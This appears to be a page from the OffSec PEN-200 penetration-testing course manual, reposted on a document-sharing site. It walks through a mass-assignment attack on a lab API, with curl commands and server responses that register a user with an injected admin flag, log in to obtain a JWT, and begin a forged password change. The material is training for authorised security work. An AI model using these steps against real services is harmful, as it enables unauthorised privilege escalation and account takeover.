Penetration Testing with Kali Linux OffSec

curl -d '{"password":"lab","username":"offsecadmin"}' -H 'Content-Type

səhifə	118/132
tarix	21.12.2023
ölçüsü
	#187693

1 ... 114 115 116 117 118 119 120 121 ... 132

PEN-200

email is a required property

curl -d '{"password":"lab","username":"offsecadmin"}' -H 'Content-Type:
application/json' http://192.168.50.16:5002/users/v1/register
{ "status": "fail", "message": "
'email' is a required property
"}
Listing 113 - Attempting new User Registration
The API replied with a fail message stating that we should also include an email address. We
could take this opportunity to determine if there’s any administrative key we can abuse. Let’s add
the
admin
key, followed by a
True
value.
kali@kali:~$
curl -d
'{"password":"lab","username":"offsec","email":"pwn@offsec.com","admin":"True"}' -H
'Content-Type: application/json' http://192.168.50.16:5002/users/v1/register
{"message": "
Successfully registered. Login to receive an auth token.
", "status":
"success"}
Listing 114 - Attempting to register a new user as admin
Since we received no error, it seems we were able to successfully register a new user as an
admin, which should not be permitted by design. Next, let’s try to log in with the credentials we
just created by invoking the login API we discovered earlier.
kali@kali:~$
curl -d '{"password":"lab","username":"offsec"}' -H 'Content-Type:
application/json' http://192.168.50.16:5002/users/v1/login
{
"auth_token":
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDkyNzEyMDEsImlhdCI6MTY0OTI3MDkwMSwi
c3ViIjoib2Zmc2VjIn0.MYbSaiBkYpUGOTH-tw6ltzW0jNABCDACR3_FdYLRkew"
, "message":
"Successfully logged in.", "status": "success"}
Listing 115 - Logging in as an admin user
356
(Mozilla, 2022), https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Objects/JSON

Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
230
We were able to correctly sign in and retrieve a JWT
357
authentication token. To obtain tangible
proof that we are an administrative user, we should use this token to change the admin user
password.
We can attempt this by forging a POST request that targets the password API.
kali@kali:~$

Yüklə

Dostları ilə paylaş:

1 ... 114 115 116 117 118 119 120 121 ... 132